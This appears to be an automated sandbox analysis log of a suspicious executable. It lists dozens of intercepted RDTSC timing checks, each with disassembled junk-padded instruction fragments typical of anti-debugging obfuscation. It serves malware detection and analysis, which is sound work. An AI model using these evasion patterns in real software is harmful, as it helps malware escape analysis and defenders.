Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63818A second address: 63818E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63818E second address: 638192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638192 second address: 6381C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E0FAFC80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F12E0FAFC80h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6381C3 second address: 6381E2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F12E108FDBFh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638592 second address: 6385AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC85h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385AD second address: 6385B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385B1 second address: 6385CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385CC second address: 6385D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385D2 second address: 6385D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638701 second address: 638714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBDh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638714 second address: 638718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63C77C second address: 63C7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12E108FDCAh 0x0000000a jmp 00007F12E108FDBEh 0x0000000f je 00007F12E108FDB6h 0x00000015 pushad 0x00000016 jmp 00007F12E108FDC0h 0x0000001b ja 00007F12E108FDB6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63C32C second address: 63C331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63C331 second address: 63C337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 64AD30 second address: 64AD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 64AD36 second address: 64AD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 64AD3A second address: 64AD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F12E0FAFC7Dh 0x0000000e js 00007F12E0FAFC76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 pop edi 0x00000018 jnp 00007F12E0FAFC8Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007F12E0FAFC76h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6505EC second address: 6505F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6505F1 second address: 650611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC84h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jl 00007F12E0FAFC76h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6497EE second address: 6497FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F12E108FDB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 65D9C7 second address: 65D9DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F12E0FAFC80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 65D9DD second address: 65D9F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6768DC second address: 676903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F12E0FAFC7Dh 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 jc 00007F12E0FAFC90h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F12E0FAFC76h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676A6B second address: 676A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676B96 second address: 676B9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676B9B second address: 676BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E108FDC4h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676BB6 second address: 676BC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F12E0FAFC8Eh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676BC7 second address: 676BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676BD0 second address: 676BD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 677022 second address: 677035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F12E108FDB6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 678D85 second address: 678D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 678D89 second address: 678D9D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F12E108FDB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F12E108FDB6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 67B968 second address: 67B96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 67F025 second address: 67F029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 67F029 second address: 67F033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB029C second address: 4BB02F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F12E108FDC6h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F12E108FDC1h 0x00000016 mov ebx, ecx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d call 00007F12E108FDC6h 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB02F3 second address: 4BB0363 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 32BBAE16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F12E0FAFC87h 0x0000000e pushfd 0x0000000f jmp 00007F12E0FAFC88h 0x00000014 add al, 00000068h 0x00000017 jmp 00007F12E0FAFC7Bh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007F12E0FAFC7Fh 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F12E0FAFC80h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0363 second address: 4BB0369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0369 second address: 4BB037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC7Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0029 second address: 4BA00D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F12E108FDC9h 0x00000008 add ch, 00000056h 0x0000000b jmp 00007F12E108FDC1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F12E108FDC0h 0x00000019 adc si, 4078h 0x0000001e jmp 00007F12E108FDBBh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F12E108FDC6h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f call 00007F12E108FDBCh 0x00000034 pop esi 0x00000035 pushfd 0x00000036 jmp 00007F12E108FDBBh 0x0000003b and eax, 0052E59Eh 0x00000041 jmp 00007F12E108FDC9h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA00D4 second address: 4BA00F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA00F0 second address: 4BA00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA00F4 second address: 4BA0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0107 second address: 4BA0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDBFh 0x00000009 add si, 9D0Eh 0x0000000e jmp 00007F12E108FDC9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F12E108FDC0h 0x0000001a and ecx, 2B03D388h 0x00000020 jmp 00007F12E108FDBBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F12E108FDC0h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0175 second address: 4BA017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70108 second address: 4B7010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B7010E second address: 4B7016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dl, 2Eh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F12E0FAFC7Fh 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F12E0FAFC82h 0x00000020 or eax, 6E0BA778h 0x00000026 jmp 00007F12E0FAFC7Bh 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B7016A second address: 4B70182 instructions: 0x00000000 rdtsc 0x00000002 mov ch, DEh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12E108FDBDh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70182 second address: 4B701AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ax, 608Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+04h] 0x00000010 jmp 00007F12E0FAFC82h 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b movsx edi, si 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70220 second address: 4B7023C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDC8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B7023C second address: 4B70240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B90E5D second address: 4B90E73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop eax 0x00000012 mov ax, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B9085A second address: 4B90860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B90860 second address: 4B908BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 pushfd 0x00000011 jmp 00007F12E108FDBAh 0x00000016 add ecx, 40EC44F8h 0x0000001c jmp 00007F12E108FDBBh 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F12E108FDC6h 0x0000002a mov ebp, esp 0x0000002c jmp 00007F12E108FDC0h 0x00000031 pop ebp 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov bx, ax 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0448 second address: 4BA045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA045D second address: 4BA0505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ch, EDh 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F12E108FDC6h 0x0000001a adc ecx, 612817C8h 0x00000020 jmp 00007F12E108FDBBh 0x00000025 popfd 0x00000026 pushad 0x00000027 push esi 0x00000028 pop ebx 0x00000029 call 00007F12E108FDC2h 0x0000002e pop esi 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov di, 2572h 0x00000037 jmp 00007F12E108FDC3h 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f pushad 0x00000040 call 00007F12E108FDC4h 0x00000045 call 00007F12E108FDC2h 0x0000004a pop esi 0x0000004b pop edi 0x0000004c mov eax, 67F6B1E7h 0x00000051 popad 0x00000052 pop ebp 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 mov si, 7DF5h 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BE005C second address: 4BE00CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E0FAFC81h 0x00000009 or ecx, 72D1C446h 0x0000000f jmp 00007F12E0FAFC81h 0x00000014 popfd 0x00000015 mov ax, 8EF7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushad 0x0000001f mov si, AB85h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F12E0FAFC87h 0x0000002c sub cl, 0000002Eh 0x0000002f jmp 00007F12E0FAFC89h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB073A second address: 4BB0791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDC1h 0x00000009 xor si, 05E6h 0x0000000e jmp 00007F12E108FDC1h 0x00000013 popfd 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F12E108FDBAh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F12E108FDC7h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0791 second address: 4BB07E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E0FAFC7Fh 0x00000009 xor ah, 0000007Eh 0x0000000c jmp 00007F12E0FAFC89h 0x00000011 popfd 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F12E0FAFC86h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B90783 second address: 4B907A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B907A0 second address: 4B907A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B907A6 second address: 4B9080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F12E108FDC9h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F12E108FDBCh 0x00000019 sbb cl, 00000078h 0x0000001c jmp 00007F12E108FDBBh 0x00000021 popfd 0x00000022 mov edx, eax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F12E108FDC1h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0197 second address: 4BB019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB019B second address: 4BB01A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01A1 second address: 4BB01A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01A7 second address: 4BB01C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01C0 second address: 4BB01C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01C4 second address: 4BB01CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01CA second address: 4BB01D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01D0 second address: 4BB01D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01D4 second address: 4BB01D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01D8 second address: 4BB020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F12E108FDC6h 0x00000012 or si, D668h 0x00000017 jmp 00007F12E108FDBBh 0x0000001c popfd 0x0000001d push eax 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB020F second address: 4BB0215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0215 second address: 4BB0219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0219 second address: 4BB0228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, bh 0x0000000e popad 0x0000000f rdtsc
